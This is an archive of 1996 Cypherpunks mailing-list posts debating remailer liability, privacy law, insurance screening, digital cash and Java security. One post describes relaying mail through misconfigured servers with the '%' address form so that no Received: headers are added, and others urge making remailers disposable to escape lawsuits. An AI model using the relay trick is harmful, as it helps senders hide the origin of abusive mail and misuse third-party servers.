From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 25 May 1996 17:50:42 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <01I53JFM4MP28Y4Z90@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960524224338.27374E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, E. ALLEN SMITH wrote:

> From:	IN%"unicorn@schloss.li"  "Black Unicorn" 24-MAY-1996 11:44:01.40

[...]

> >In the practical world, the plaintiff who is trying to enforce a software
> >licensing agreement is much better off than a defendant trying to resist
> >liability for a tort.
> 
> 	I would gather that countersuits for violation of a contract - that not
> to sue - would not be likely to succeed. Unfortunate.

Really hard to get courts to pay attention to these.
Signing away the right to process is a thorny thing.

> >That depends.  If there was reason to believe, for instance, that the
> >message might indeed be four-horseman type (as a plaintiff's attorney I
> >would jump all over any messages which came from "soandso@PLO.com" or
> >somesuch) then negligence becomes an issue regardless.  Perhaps the host
> >was the site from which other nastiness was mailed?  Anything that could
> >be shown to put the operator on effective, implied, or constructive notice
> >that something was amiss.
> 
> 	A clear reason for demanding that mail come from a recognized remailer
> before putting it to an output end. In this case, the ouputting remailer never
> has to worry about it - that's the job of the actual primary inputting
> remailer.

Remailers on the attack points (first in chain, last in chain) simply MUST
be disposable as tissue.  They must be run as anonymously as possible,
with as little connection to the ISP's assets as possible and immediately
disposable.  They must be easy to set up, runable without root and there
must be a much more efficent tracking mechanism.  (Mr. Levin has done a
terrific job, but even more needs to be done).

This wanton suing, as I think we all know, is an abuse of the copyright
protections and their intent.  The only way to really deal with it is make
remailers unassailable.  Doing that with tricky dick type legal arguments
will, in my view, eventually fail.

It only takes ONE operator to get a tiny ($2500-$10,000) fine or judgement
and that will be the end of most of the mailers.  Poof.

This we cannot allow.

> 
> >Remember, technical savvy judges are few and far between.  Technical savvy
> >juries are nearly non-entitites.  My concept of what is or is not
> >suspicious when it comes to such things is going to be much more
> >sophisticated than that of a judge or jury in most if not all cases.
> 
> >This is an important point.
> 
> >The truth of the matter is entirely pointless in the U.S. Judicial system.
> >The APPEARANCE of the matter is key.
> 
> >'punks seem to forget this in all their discussion of what a court might
> >do because, simply put, they know more than 99% of the population about
> >the subject.
>  
> 	The simple way to put this is that juries and, indeed, the voting
> population, are completely incompetent to be in power. This is always
> something that one should remember, and an excellent argument as to why
> democracy is not a good system of government.

I wouldn't go this far.  It is an excellent argument for picking juries
that are experts with regard to the subject at hand.

In my view trying to balance bias rather than eliminate it is much more
effective.

> 
> >From the recipiant?
> >I would simply put a notice of where complaints can be directed to, and
> >publish a stated (and carefully worded) policy for addressing abuses.
> 
> >This will go a LONG way to insulating remailer operators.

[...]

> 	Would also doing a respond-back hold harmless agreement, of the form
> perhaps of: "We do our best to guarantee that this system will not be used
> illegitimately. Unfortunately, this is not always possible. By responding to
> this message and requesting us to send you the information in question, you are
> agreeing to hold us harmless." help any? Or would this be seen by the court as
> an attempt to reduce liability when the court (incorrectly) believes it should
> be assigned?

If harassing mail is the issue, I can see how this might help in terms of
image.  I don't think its a complete solution however.

Again, I think the attack points have to be protected.

> 	-Allen
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 25 May 1996 15:29:10 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <Pine.LNX.3.93.960524175148.604C-100000@smoke.suba.com>
Message-ID: <Pine.SUN.3.93.960524225500.27374F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, snow wrote:

> On Fri, 24 May 1996, Black Unicorn wrote:
> > On Thu, 23 May 1996, Mike Duvos wrote:
> > > > believe that Matt Blaze recently received "The Briefing" and he is
> > > > still on our side.
> > > Don't suppose Matt could do a little executive summary of 
> > > "The Briefing" and post it to the list, could he?
> > Probably not unless he wanted to do time.
> > I suspect some anonymous person might put bamboo shoots under his
> > fingernails and post the results of the interrogation however.
> 
> 	Isn't this exactly what the anon remailers were designed for?

That was the point, yes.

> 
> Petro, Christopher C.
> petro@suba.com <prefered for any non-list stuff>
> snow@crash.suba.com
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Sat, 25 May 1996 15:29:27 +0800
To: cypherpunks@toad.com
Subject: Re: Alternative to remailer shutdowns...
In-Reply-To: <19960524.1408058.1225D@kermit.aatech.com>
Message-ID: <9605250258.AA00973@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain


>     There are hundreds of machines littered around the net that
> dont bother adding "received" headers to mail.
[ . . . ]
> Another possibility is that rather than operating remailers at all, maybe 
> we should be operating non-logging smtp hosts that dont add received 
> headers. Building a client to take advantage of these servers would be 
> trivial (i wrote one last night, and i am not proficient in C) and it 
> could be argued that the situation was not created intentionally to allow 
> anonymous messages, merely to preserve disk space and bandwidth.

	You really don't even need a client.  RFC822 defines a method
for bouncing mail through another server.  Just use

"user%final.dest.com@laxly.configured.org" 

as the address and laxly.configured.org will send it on to
user@final.dest.com.  

	Wonder what would happened if the sendmail in the
(Linux|NetBSD|your favourite i386 UNIX) distributions came cofigured
to not add Received: headers by default . . . .  Probably would make
diagnosing bounces hell, but it would make a lot of remailer-chain
tail ends.

	Anyone tried out whitehouse.gov to see if it's adding
Received:'s or not yet? :)

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 25 May 1996 15:26:46 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Remailers - What exists?
Message-ID: <Pine.SUN.3.93.960524225935.27374H-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




Question:

Which remailers can be run without root?

Which remailers can be run best on the most systems?

Which remailers are easiest to set up?


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 25 May 1996 17:23:10 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Children's Privacy Act
In-Reply-To: <01I53P6L2ZIQ8Y4ZAY@mbcl.rutgers.edu>
Message-ID: <Pine.GUL.3.93.960524225522.3827A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, E. ALLEN SMITH wrote:

> 	In regards to accepting the risk themselves, look at what happens when
> you have insurance companies that are required to accept everyone at an equal
> price. The ones who have information - denied to the insurance company - that
> they're going to get sick will sign up more than the ones who won't. Take
> Huntington's as an example. If genetic screening is prohibited to insurance
> companies, someone who has a test and finds out that they've got the allele
> for Huntington's, and thus will get sick and die from it, is going to go down
> and get themselves insurance. Then the insurance - e.g., everyone else who
> buys from that insurance company - will have to pay for them when they need
> several years of nursing care before dying. How is this fair to everyone else,
> including the insurance company?

I'm sure you know the law and practice better, but my insurance seems to
have a "preexisting conditions" clause. Knowingly doing the above
constitutes fraud. (Of course lots of people probably get away with it.)

Moreover, when the insurance company pays out, that ultimately comes out
of premiums. I don't have Huntington's, but I don't mind paying an extra
$X into a risk pool for people with Huntington's because it means I don't
have to submit to genetic screening, either. You don't have to have
something to hide to see it as an invasion of privacy. It's a pool of
consumers establishing preferences, not just individual consumers v. 
producers. The meaning of microeconomics changes as it scales.

> 	You spoke of fairness. Capitalism isn't fair; neither is life. Someone
> who is bigger physically will have to spend more on food to keep alive than
> someone who is small. Does that argue for socialization of food, so that

[Yawn]

By "fairness" I meant that equal risks should be treated equally. Cost of
disease A = cost of disease B. The detection of predisposition to disease
A is politically feasible, but the same isn't true for disease B. I'd say
you were discriminating against people predisposed to disease A, because
they're paying into the risk pool for B, but B isn't paying into the risk
pool for A. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 25 May 1996 15:38:31 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Children's Privacy Act
In-Reply-To: <01I53GHKZH1M8Y4Z90@mbcl.rutgers.edu>
Message-ID: <8ldbhXq00iWT09gHY9@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 24-May-96 Re: Children's Privacy Act
by "E. ALLEN SMITH"@ocelot. 
>         I have examined it; I see no reason to change my stated opposition
> to it. Quite simply, it is an invasion of the privacy rights of businesses to
> force them to turn over such information as the law demands they turn
over; it
>  
> is an invasion of the property rights of businesses to mandate what they do
> with the information they have received and consequently own.

>From a strict libertarian standpoint, it may implicate property rights.
I won't argue that.

But I tend to think of my (and individual) privacy rights as ones that
should receive greater attention than a businesses "privacy rights." If
they have mailing list info on me, I'd like to know where they got it.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 25 May 1996 16:24:13 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Is Chaum's System Traceable or Untraceable?
In-Reply-To: <01I53GAYSQUC8Y4Z90@mbcl.rutgers.edu>
Message-ID: <Pine.LNX.3.93.960524230954.96A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, E. ALLEN SMITH wrote:

> From:	IN%"iang@cs.berkeley.edu" 23-MAY-1996 13:56:31.71
> 
> >Ah.  I see I was misunderstood.  The goal was not to make the shop anonymous,
> >but rather to be able to provide change to an anonymous payer.
> 
> 	I had thought that the basic purpose of the fully anon system was just
> that - full anonymnity for payer and payee. Under your suggestion, the shop
> gives up this anonymnity under these circumstances in order to be able to make
> change. I'm not sure if I would call that a very good tradeoff...

	Howzabout this: Figure out about how many coins of each denom. the
shop should have on hand, and every so often the shop goes online to even
out it's til. That way the shop maintains the capability to make change
for anything. 
	Alternative: Instead of the shop going online every <x> minutes,
set it up so that everytime the shop goes online it evens out the til so
that it really isn't know whether the shop went online to make change for
a specific customer, or just to even out the til.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 15:38:17 +0800
To: cp@panix.com
Subject: Re: Anarchy Online
Message-ID: <01I53NY1MORK8Y4ZAY@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"cp@panix.com"  "Charles Platt" 24-MAY-1996 20:49:17.28
To:	IN%"llurch@networking.stanford.edu"  "Rich Graves"
CC:	IN%"declan@well.com"  "Declan McCullagh", IN%"cypherpunks@toad.com"
Subj:	RE: Anarchy Online

Received: from toad.com by mbcl.rutgers.edu (PMDF #12194) id
 <01I53IQ90DU88WW6WB@mbcl.rutgers.edu>; Fri, 24 May 1996 20:49 EDT
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id OAA19674 for
 cypherpunks-outgoing; Fri, 24 May 1996 14:36:05 -0700 (PDT)
Received: from panix.com (panix.com [198.7.0.2]) by toad.com (8.7.5/8.7.3) with
 ESMTP id OAA19649 for <cypherpunks@toad.com>; Fri,
 24 May 1996 14:35:32 -0700 (PDT)
Received: (from cp@localhost) by panix.com (8.7.5/8.7/PanixU1.3) id RAA16576;
 Fri, 24 May 1996 17:35:33 -0400 (EDT)
Date: Fri, 24 May 1996 17:35:33 -0400 (EDT)
From: Charles Platt <cp@panix.com>
Subject: RE: Anarchy Online
In-reply-to: <Pine.GUL.3.93.960524131950.29645M-100000@Networking.Stanford.EDU>
Sender: owner-cypherpunks@toad.com
To: Rich Graves <llurch@networking.stanford.edu>
Cc: Declan McCullagh <declan@well.com>, cypherpunks@toad.com
Message-id: <Pine.SUN.3.91.960524173225.12653D-100000@panix.com>
X-Envelope-to: eallensmith
Content-type: TEXT/PLAIN; charset=US-ASCII
MIME-Version: 1.0
Precedence: bulk

>On Fri, 24 May 1996, Rich Graves wrote:

>> Oh, I have no doubt that he believes everything you tell him. So, Charles,
>> do you think I'm a net.loon, and why? Please reply publicly on
>> cypherpunks. I'd like E. Allen Smith and Jim Bell to read this.

>Your wish is my command, but--who are they?

	I am not particularly sure why Rich named either me or Jim Bell as
particular recipients of this message. If you're curious as to what my
viewpoint is, I would suggest reading over various CuDigest issues that show
up as having messages from EALLENSMITH or E. Allen Smith on them (the
mbcl.rutgers.edu sometimes fluctuates).

>Actually Rich it took me a while to remember you. The Zundel affair didn't
>loom large in my life (because I wasn't part of it, I guess). I assumed
>you had long since moved on to more important matters.  I have no idea
>whether you are a net.loon. But I am sorry if I misspelled your name in my
>book, and indeed as soon as I get offline here, I'm going to do a word
>search. We're making the text into pages right now, so the time is right. 

	I would guess Rich is referring to that Declan was actually the second
person to put up a mirror and publicize it; Rich was the first. (I may not be
completely accurate in this; not being one of the participants, I didn't
exactly follow the Rich-Declan discussion on the subject here on cypherpunks
that closely.)
	Interesting book from what I've read of it; I will read farther when
I have time.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 15:34:46 +0800
To: unicorn@schloss.li
Subject: Re: An alternative to remailer shutdowns
Message-ID: <01I53O6XASPY8Y4ZAY@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 24-MAY-1996 20:51:51.95

>Nothing.  Perhaps block e-mail from the address the threat mail was sent
>from after a certain number of legitimate complaints.

>This, of course, depends on the threats/whatever being sent to the
>remailer in question as a 'first in chain' mailer.

	It also depends on the remailer being able to tell that the messages
in question came from a particular address. If the messages are encrypted with
the keys of the other remailers in the chain (as should be the case for proper
privacy, etcetera), then there's no real way to tell for many cases. About the
only exception would be recognizable spam, all being sent along the same
remailer path (notice that lots and lots of mail is being sent from an address,
and is going out to the same other remailer).

>Ask the recipient if he or she wishes all encrypted mail addressed to his
>or her key to be supressed.

	This is a version of the final remailer blocking mail to a particular
address, at least using the possible means (see above).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sat, 25 May 1996 17:23:17 +0800
To: "cypherpunks@toad.com>
Subject: RE: Truth is equivalent to law?
Message-ID: <01BB49C9.BC665DA0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Jim Choate

What you and others offer is a bipolar anthropocentic example of the schism
our rapid technology has generated in our lives.
......................................................................

Well you may be right and this may be The Absolute Truth, but I'm not saying anymore because it's hurting my brain to think about it.


     ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 16:39:40 +0800
To: frantz@netcom.com
Subject: Re: Runtime info flow in Java
Message-ID: <01I53OEA1Q5O8Y4ZAY@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com" 24-MAY-1996 21:22:44.97

>A lot of the answer depends on what you mean by secure.  For example, if
>the Java run-time can successfully contain Java applets so they can't
>access any of the unsecured portions of your OS, then it doesn't matter
>that those OS holes exist as far as protection from the applets is
>concerned.  The proof that the Java run-time actually can do this
>containment is left as an exercise for the student :-).

	This does, of course, depend on one's knowing where the holes in the
OS are. The Java approach, at least by default, appears to be to shut all
the places where they think a hole might be, while leaving open those which an
applet practically has to use. (E.g., it shouldn't be possible under the
current design for an untrusted applet to access the disk; since an applet does
need to use the CPU, it can consume CPU time.)

>We can use certificates (ref: SPKI) to implement network capabilities. 
>These certificates make statements of the form: The holder of the secret
>key which corresponds to this public key is permitted these specific forms
>of access to this specific resource on this location (e.g. a URL).  These
>certificates can act like capabilities.  They can be passed by creating a
>new certificate for the receiver which gives it the privileges implied by
>the old certificate.  They can be rescinded in any of a number of ways.

	I suppose that the new certificate is created through a message
signed by the old certificate's private key?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 25 May 1996 17:32:24 +0800
To: cypherpunks@toad.com
Subject: Re: Children's Privacy Act
Message-ID: <adcbf63906021004efdc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:15 AM 5/25/96, Declan B. McCullagh wrote:

>But I tend to think of my (and individual) privacy rights as ones that
>should receive greater attention than a businesses "privacy rights." If
>they have mailing list info on me, I'd like to know where they got it.

Well, I'd like a lot of things, but that doesn't mean I'm entitled to them.

And I think the confusion between "business rights" and "individual rights"
is part of the problem here. That is, I don't see any significant
distinction, nor does the Constitution say anything about rights being
different. At least not for the rights usually considered to be the central
rights. Thus, there is not free speech for individuals, but not for the
owner of a company.

(There are many quibbles that can be made, about the alleged right of
government to regulate business, interstate commerce, etc. And about the
various laws that demonstrably apply to businesses, but not to individuals
(OSHA, business taxes, etc.). And, regrettably, the government has placed
limits on the advertising that companies--or presumably individuals--can
do.)

Not to sound rude to either Declan or Rich, but here's the bottom line:

If I have compiled records, dossiers, etc., as I most assuredly have (got
to fill up those MO disks with something), this is "my" information. Mine
in the sense that others can't dictate to me what I do with it.

What Rich or Declan "wants" is beside the point.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 25 May 1996 15:52:56 +0800
To: cypherpunks@toad.com
Subject: RE: Truth is equivalent to law? (fwd)
Message-ID: <199605250439.XAA25212@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Blanc,

Forwarded message:

> From: blanc <blancw@accessone.com>
> Subject: RE: Truth is equivalent to law?
> Date: Fri, 24 May 1996 18:14:33 -0700
> 
> The quote I offered had to with our capacity to know the phenomena of =
> the world (in any amount) and consequently our ability to exert control =
> over these universal forces (or "laws") to whatever degree.

Why is this so surprising? We are nothing more than a manifistation of those
self same forces. It is not us manipulating nature, it is nature
manipulating nature. This is why there are no Truths and what we do know of
truth is more a tale about us than about what we 'know' of the universe..
The universe is sentient, and we are it (as far as we know).

What you and others offer is a bipolar anthropocentic example of the schism
our rapid technology has generated in our lives.

> I guess your argument is that we can't even discuss the properties of =
> truth, harmful or not, because we can't even be sure that there is any =
> truth in existence.

There is no absolute truth. As I have stated before when this issue has
arisen, the truth we all see and know so well is nothing more than a
representation of what good pattern recognition engines our brains are.
One which makes mistakes in easily proven ways (e.g. optical illusions).

> This makes all your robotics projects bogus exercises in futility, hmm?

Actualy I have been building robots for nearly 20 years now.


                                                  Jim Choate


                                    \\/////    "Don't have a cow, man"
                                    |     |  / 
                                    (.) (.)
      ===========================oOO==(_)==OOo==========================             

         Tivoli an IBM company                  CyberTects: SSZ
         Customer Support Engineer              SOHO Consulting/VR/Robotics

         9442 Capitol of Texas Highway North    1647 Rutland
         Suite 500                              #244  
         Austin, TX 78759                       Austin, TX  78758

         Email: jchoate@tivoli.com              Email: ravage@ssz.com
         Phone: (512) 436-8893                  Phone: (512) 259-2994
         Fax:   (512) 345-2784                  Fax: n/a
         WWW:   www.tivoli.com                  WWW: www.ssz.com
         Modem: n/a                             Modem: (512) 836-7374
         Pager: n/a                             Pager: n/a
         Cellular: n/a                          Cellular: n/a

      ===================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 16:47:01 +0800
To: llurch@networking.stanford.edu
Subject: Re: Children's Privacy Act
Message-ID: <01I53P6L2ZIQ8Y4ZAY@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"llurch@networking.stanford.edu"  "Rich Graves" 24-MAY-1996 21:35:29.54

>I think forgiveness, within reason, tends to have a positive economic
>effect. I'm not the same person I was seven years ago, or even seven
>months. (Is it 7 years, btw? Or was it 12? It's arbitrary, in any case.) 

>I have no objection to allowing someone to become, and remain, a
>productive member of society years after fucking up badly. Note there are
>no statutes of limitations and no forgive-and-forget mandates for the more
>heinous violent crimes.

	I have no objections to giving people a second chance. I just like to
know _when_ I'm giving someone a second chance. What the laws in question say
is that companies - and individuals, so far as I know - shouldn't be allowed
to have that knowledge.

>Someone once said something about giving up a little freedom in return for
>security.

	Do try to keep in mind the freedom of the data-gatherer. This was also
said in regards to government. I'd agree with keeping governments and similar
coercive forces (e.g., monopolistic and ogliopolistic companies) from having
this information, or from misusing it if they have to have it for some
reason.

>OK, that's a straw man. The last couple examples show why some laws aren't
>necessary. The market simply wouldn't accept a too-totalitarian insurance
>company; people would rather pay as they go, and accept the risk
>themselves. But why is it fair to discriminate against detectable risks,
>when undetectable risks may be more expensive? 

	Discriminate? A rather loaded term. I generally define discrimination,
and have confirmed this definition by a dictionary check, as bias against
someone on a basis other than rational information. If someone refuses to hire
me for a job necessitating calligraphy, they aren't discrimiating against me
or other people with bad handwriting (including those, like me, who have that
due to neurological problems). They're being rational. A health insurance
company that judges who should be insured by that company on the basis of
whether the person is likely to get sick is surely being rational. A credit
company that judges who should get credit from that company on the basis of
whether that person is likely to declare bankrupcy is surely being rational.
	Moreover, even when it isn't rational, it's still that company's
business what it does with its dollars. It's analogous to the problem of
not allowing people to freely contract not to sue, as in remailers. While it
might be considered stupid for someone to do so - particularly in hindsight,
when they're claiming that they should be able to do so - the person should
still be allowed to do so.
	In regards to accepting the risk themselves, look at what happens when
you have insurance companies that are required to accept everyone at an equal
price. The ones who have information - denied to the insurance company - that
they're going to get sick will sign up more than the ones who won't. Take
Huntington's as an example. If genetic screening is prohibited to insurance
companies, someone who has a test and finds out that they've got the allele
for Huntington's, and thus will get sick and die from it, is going to go down
and get themselves insurance. Then the insurance - e.g., everyone else who
buys from that insurance company - will have to pay for them when they need
several years of nursing care before dying. How is this fair to everyone else,
including the insurance company?
	You spoke of fairness. Capitalism isn't fair; neither is life. Someone
who is bigger physically will have to spend more on food to keep alive than
someone who is small. Does that argue for socialization of food, so that
those who are big (partially a genetic trait) won't have to pay any more? Some
people are smarter than others. Does that mean that the ones who are smart
should be handicapped artificially to make everything fair?
	Most arguments on fairness ultimately come down to either appeals to
gut instincts - not a valid argument - or philosophical ones, generally
Rawls' Theory of Justice. That one has a problem. Rawls thought that the
most just social system was that which a group of people would come up with
when they didn't know what position they'd be in. This would lead to equality,
since nobody'd want to be in the low position, right? Wrong. People can
rationally take a chance. If you give someone a choice between gambling for
(on the flip of a 50/50 coin) 150 or 0 dollars, and getting 50 dollars
guaranteed, the rational choice is the gamble. In other words, if it is more
efficient - as I have argued - for things to be unequal, then this idea of
what justice is would argue for inequality being just.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 25 May 1996 18:18:00 +0800
To: cypherpunks@toad.com
Subject: Re: Children's Privacy Act
Message-ID: <adcbfd64070210049f20@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:36 AM 5/25/96, Rich Graves wrote:

>I think forgiveness, within reason, tends to have a positive economic
>effect. I'm not the same person I was seven years ago, or even seven
>months. (Is it 7 years, btw? Or was it 12? It's arbitrary, in any case.)


But "forgiveness" is highly personal. That you set your personal statute of
limitations at X years does not mean others do.

>I have no objection to allowing someone to become, and remain, a
>productive member of society years after fucking up badly. Note there are
>no statutes of limitations and no forgive-and-forget mandates for the more
>heinous violent crimes.

You are of course free to act on your beliefs and forgive such persons.

I am of course free to remember what they did and not forgive them. Or,
more likely, not give them a job, not lend them money, not enter into
business dealings with them, etc.

(The likeliest main application of data havens are for such things. Things
like "rent deadbeats," credit data extending further back in time than the
"Fair Credit Reporting Act" chooses to allow, data bases of bad doctors and
lawyers, etc.)


Like most laws "banning discrimination," the Fair Credit Reporting Act is a
gross violation of freedoms.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 17:03:27 +0800
To: unicorn@schloss.li
Subject: Re: An alternative to remailer shutdowns
Message-ID: <01I53PQSSUL88Y4ZAY@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 24-MAY-1996 22:52:03.64

>Remailers on the attack points (first in chain, last in chain) simply MUST
>be disposable as tissue.  They must be run as anonymously as possible,
>with as little connection to the ISP's assets as possible and immediately
>disposable.  They must be easy to set up, runable without root and there
>must be a much more efficent tracking mechanism.  (Mr. Levin has done a
>terrific job, but even more needs to be done).

	Why the first in chain? If the anti-traffic-analysis provisions are
working properly, it should be impossible to prove that a given first remailer
was the first remailer for any particular message. I had thought that even
civil courts required that you be the person who committed some act, not the
person who _might_ have committed some act. Otherwise, all the remailers are
in danger. This is even if someone tries an entrapment by sending through some
illegal material - if the courts accept that they should be allowed to do this,
then all the remailers they chained are going to be hit.

>This wanton suing, as I think we all know, is an abuse of the copyright
>protections and their intent.  The only way to really deal with it is make
>remailers unassailable.  Doing that with tricky dick type legal arguments
>will, in my view, eventually fail.

	Ultimately, I have to agree. Protect the remailers as much as possible
with the legal arguments... but don't depend on them. The government in general
has no motivation to protect the remailers. They've got a motivation to protect
ISPs, and thus may put in protections for them regarding liability.

>It only takes ONE operator to get a tiny ($2500-$10,000) fine or judgement
>and that will be the end of most of the mailers.  Poof.

	What, pray tell, is the result of a judgement in which the person
manifestedly doesn't have the money to pay? I couldn't pay a 10,000 dollar
judgement; I don't have that much money. I would guess it'd be some form
of attachment of income; this wouldn't get them much...

>This we cannot allow.

	Quite.

>I wouldn't go this far.  It is an excellent argument for picking juries
>that are experts with regard to the subject at hand.

	One step in this direction would be requiring some level of education
from juries. If the defendant is someone with a college degree, require the
jurors to have a college degree. If the defendant is someone with a Ph.D.,
require the jurors to have a Ph.D. or similarly high equivalent (J.D., M.D.,
etcetera). While this doesn't mean that the jury will necessarily know what's
being talked about (I've given presentations to _graduate_ school seminars in
which I went well over the heads of everyone in the class - including the
professor - after spending maybe four weeks working on the project), it does
increase the chance that they're at least teachable.

>In my view trying to balance bias rather than eliminate it is much more
>effective.

	Modification of jury selection? Removal of some of the preemptory
challenges? Hmm... some challenges are for cause, as I recall. Unless it's
a particulary egregious case of such, I'd suggest allowing the other side to
override such with expenditure of a preemptory challenge.

>If harassing mail is the issue, I can see how this might help in terms of
>image.  I don't think its a complete solution however.

>Again, I think the attack points have to be protected.

	Agreed.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 15:50:01 +0800
To: declan+@CMU.EDU
Subject: Re: Children's Privacy Act
Message-ID: <01I53Q0L7J6A8Y4ZAY@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"declan+@CMU.EDU"  "Declan B. McCullagh" 24-MAY-1996 23:16:49.32

>From a strict libertarian standpoint, it may implicate property rights.
>I won't argue that.

>But I tend to think of my (and individual) privacy rights as ones that
>should receive greater attention than a businesses "privacy rights." If
>they have mailing list info on me, I'd like to know where they got it.

	Well, it's either from someone you chose to hand it over to... or
from someone you didn't. In the first case, it's your problem. In the second
case, then you've got a claim. We have no disagreement on that governments and
other coercive institutions shouldn't be allowed to collect more information
than necessary, or to release any such information to an uninvolved third
party. As Hal pointed out, we also have no disagreement with trying to reduce
